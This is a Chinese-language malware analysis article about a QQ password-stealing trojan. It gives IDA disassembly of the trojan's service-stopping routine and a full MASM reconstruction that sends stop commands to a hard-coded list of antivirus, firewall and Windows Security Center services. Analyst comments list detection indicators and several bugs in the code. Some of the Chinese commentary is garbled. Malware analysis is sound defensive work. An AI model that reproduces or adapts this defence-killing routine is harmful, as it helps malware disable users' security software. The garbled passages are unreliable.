
不完全逆向分析啊拉QQ大盗


  .shrink:0040967C loc_40967C:                  
  .shrink:0040967C           push   offset ServiceStatus ; lpServiceStatus
  .shrink:00409681           push   esi         ; hService
  .shrink:00409682           call   QueryServiceStatus ; 查询设备驱动器确以后形态
  .shrink:00409682
  .shrink:00409687           test   eax, eax
  .shrink:00409689           jnz   short loc_409669 ; 查询未成功,连续休泯,然后再查询
  .shrink:00409689
  .shrink:0040968B
  .shrink:0040968B loc_40968B:                  
  .shrink:0040968B           cmp   ServiceStatus.dwCurrentState, 1
  .shrink:00409692           jz     short loc_4096A8 ; 对比是否收到控制代码SERVICE_STOP_PENDING
  .shrink:00409692
  .shrink:00409694           push   esi         ; hSCObject
  .shrink:00409695           call   CloseServiceHandle ; 封闭这个服务
  .shrink:00409695
  .shrink:0040969A           push   edi         ; hSCObject
  .shrink:0040969B           call   CloseServiceHandle
  .shrink:0040969B
  .shrink:004096A0           jmp   short loc_4096A8
  .shrink:004096A0
  .shrink:004096A2 ; ---------------------------------------------------------------------------
  .shrink:004096A2
  .shrink:004096A2 loc_4096A2:                  
  .shrink:004096A2           push   edi         ; hSCObject
  .shrink:004096A3           call   CloseServiceHandle ; 封闭翻开服务办理器的句柄
  .shrink:004096A3
  .shrink:004096A8
  .shrink:004096A8 loc_4096A8:                  
  .shrink:004096A8                          
  .shrink:004096A8                          
  .shrink:004096A8                          
  .shrink:004096A8           xor   eax, eax
  .shrink:004096AA           pop   edx
  .shrink:004096AB           pop   ecx
  .shrink:004096AC           pop   ecx
  .shrink:004096AD           mov   fs:[eax], edx
  .shrink:004096B0           push   4096C5h ;
  .shrink:004096B5           lea   eax, [ebp+var_4]
  .shrink:004096B8           call   sub_403B68
  .shrink:004096B8
  .shrink:004096BD           retn
  .shrink:004096BD
  .shrink:004096BD sub_4095FC     endp ; sp = -18h
  原来是通过连接服务控制管理器来关闭服务：如果 ControlService 函数执行不成功，就关闭句柄退出；反之，查询 ControlService 执行后管理器返回的 ServiceStatus 结构成员 dwCurrentState 的值，若不是 SERVICE_STOP_PENDING 标记，就代表关闭成功，就可以关闭这个服务了。其实这是很简单的。
  下面就给出汇编源代码
  ;***************************************************************
  ; Program written by Asm
  ; Date: 2007-03-07
  ; Origin: 红狼安全小组 (Red Wolf security group)
  ; Note: if reposting, keep this program intact and attribute it.
  ; Note: source published for technical exchange only; the user bears
  ;       full responsibility for any loss caused by using it!
  ;***************************************************************
  ;---------------------------------------------------------------
  ; Analyst note: this is the page author's MASM reconstruction of the
  ; service-stopping routine shown in the disassembly above (sub_4095FC).
  ; Target: 32-bit Windows, flat model, stdcall; only kernel32 and
  ; advapi32 (Service Control Manager API) are linked.
  ; Behaviour (see _CloseService): for one service name it opens the SCM,
  ; opens the service, sends SERVICE_CONTROL_STOP, reads dwCurrentState
  ; back, closes handles and then terminates the process via ExitProcess.
  ; Detection: a process opening the SCM with SC_MANAGER_CREATE_SERVICE and
  ; sending SERVICE_CONTROL_STOP to the services listed below; stops are
  ; recorded by the Service Control Manager in the System event log, and
  ; the plain-text names in .data are a usable static indicator.
  ;---------------------------------------------------------------
  .386
  .model flat, stdcall
  option casemap :none
  include windows.inc
  include kernel32.inc
  include advapi32.inc
  includelib kernel32.lib
  includelib advapi32.lib
  _CloseService PROTO :DWORD             ; one DWORD argument: pointer to a service name
  .data
  ; Service names passed one at a time to _CloseService (see start:).
  ; They appear to be antivirus/firewall product service names plus
  ; wscsvc (Windows Security Center) -- vendor mapping not confirmed here.
  s_Rsccenter db "RsCCenter"
  s_Kvsrvxp db "KVSrvXP"
  s_Kavsvc db "kavsvc"
  s_Kpfwsvc db "KPfwSvc"
  s_Kwatchsvc db "KWatchSvc"
  s_Wscsvc db "wscsvc"
  s_Sndsrvc db "SNDSrvc"
  s_Ccproxy db "ccProxy"
  s_Ccevtmgr db "ccEvtMgr"
  s_Ccsetmgr db "ccSetMgr"
  s_Spbbcsvc db "SPBBCSvc"
  s_SymantecCoreL db "Symantec Core LC"
  s_Navapsvc db "navapsvc"
  s_Npfmntor db "NPFMntor"
  s_Mskservice db "MskService"
  s_Mctaskmanager db "McTaskManager"
  s_Mcshield db "McShield"
  s_Mcafeeframewo db "McAfeeFramework"
  .code
  ;---------------------------------------------------------------
  ; _CloseService(_Service)
  ; In:     _Service = pointer to a service name string (see .data)
  ; Out:    never returns -- every path ends at ExitProcess below, so
  ;         the instruction after the caller's invoke is not reached.
  ; Locals: hSCManager, hService, ServiceStatus. The disassembly above
  ;         uses a static ServiceStatus ("push offset ServiceStatus");
  ;         this reconstruction keeps it on the stack.
  ;---------------------------------------------------------------
  _CloseService proc _Service
  local hSCManager:DWORD
  local hService:DWORD
  local ServiceStatus:SERVICE_STATUS
  invoke OpenSCManager,NULL,NULL, SC_MANAGER_CREATE_SERVICE ; connect to the Service Control Manager; SC_MANAGER_CREATE_SERVICE is more than OpenService needs and presumably fails under a non-administrative account -- confirm
  .if eax!=0
  mov   hSCManager, eax ; connected: eax is the SCM handle
  .elseif
  jmp ExitSCManager     ; on failure ExitSCManager closes hSCManager, which was never assigned
  .endif
  invoke OpenService, hSCManager,_Service,0F01FFh ; open the named service; 0F01FFh equals SERVICE_ALL_ACCESS
  .if eax!=0
  mov hService,eax      ; eax is the service handle
  .elseif
  jmp ExitSCManager     ; service not found / no access: close the SCM handle and exit
  .endif
  invoke ControlService,hService,SERVICE_CONTROL_STOP,addr ServiceStatus ; ask the SCM to stop the service (author: stop the firewall service); the status goes to ServiceStatus
  .if eax == NULL
  jmp ExitSCManager     ; stop request rejected: exit without closing hService
  .endif
  invoke Sleep,1000     ; wait 1 s; the disassembly's comment at loc_40967C describes a sleep-and-retry loop, this reconstruction queries once
  invoke QueryServiceStatus,hService,addr ServiceStatus ; read the state back into ServiceStatus
  .if eax != NULL
  cmp ServiceStatus.dwCurrentState,SERVICE_STOP_PENDING ; author: SERVICE_STOP_PENDING means the stop succeeded
  jnz ColseIt           ; ColseIt is the very next instruction on both outcomes, so this compare has no effect
  .endif
  ColseIt:
  cmp ServiceStatus.dwCurrentState,1h ; 1 = SERVICE_STOPPED (SERVICE_STOP_PENDING is 3); matches "cmp ServiceStatus.dwCurrentState, 1" at loc_40968B above
  jz ExitSCManager      ; already stopped: close only the SCM handle (hService stays open) and exit
  invoke CloseServiceHandle,hService
  invoke CloseServiceHandle,hSCManager ; then falls through into ExitSCManager, which closes hSCManager a second time
  ExitSCManager:
  invoke CloseServiceHandle, hSCManager
  invoke ExitProcess,NULL ; terminates the whole process here; the proc never returns to start:
  _CloseService endp
  ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  ;---------------------------------------------------------------
  ; Entry point. Each invoke passes one .data service name to
  ; _CloseService. Because every path through _CloseService ends in
  ; ExitProcess, only the first invoke (s_Rsccenter) runs as written;
  ; the remaining invokes are unreachable.
  ;---------------------------------------------------------------
  start:
  invoke _CloseService,addr s_Rsccenter
  invoke _CloseService,addr s_Kvsrvxp
  invoke _CloseService,addr s_Kavsvc
  invoke _CloseService,addr s_Kpfwsvc
  invoke _CloseService,addr s_Kwatchsvc
  invoke _CloseService,addr s_Wscsvc
  invoke _CloseService,addr s_Sndsrvc
  invoke _CloseService,addr s_Ccproxy
  invoke _CloseService,addr s_Ccevtmgr
  invoke _CloseService,addr s_Ccsetmgr
  invoke _CloseService,addr s_Spbbcsvc
  invoke _CloseService,addr s_SymantecCoreL
  invoke _CloseService,addr s_Navapsvc
  invoke _CloseService,addr s_Npfmntor
  invoke _CloseService,addr s_Mskservice
  invoke _CloseService,addr s_Mctaskmanager
  invoke _CloseService,addr s_Mcshield
  invoke _CloseService,addr s_Mcafeeframewo
  end start
 


    文章作者: 福州军威计算机技术有限公司
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
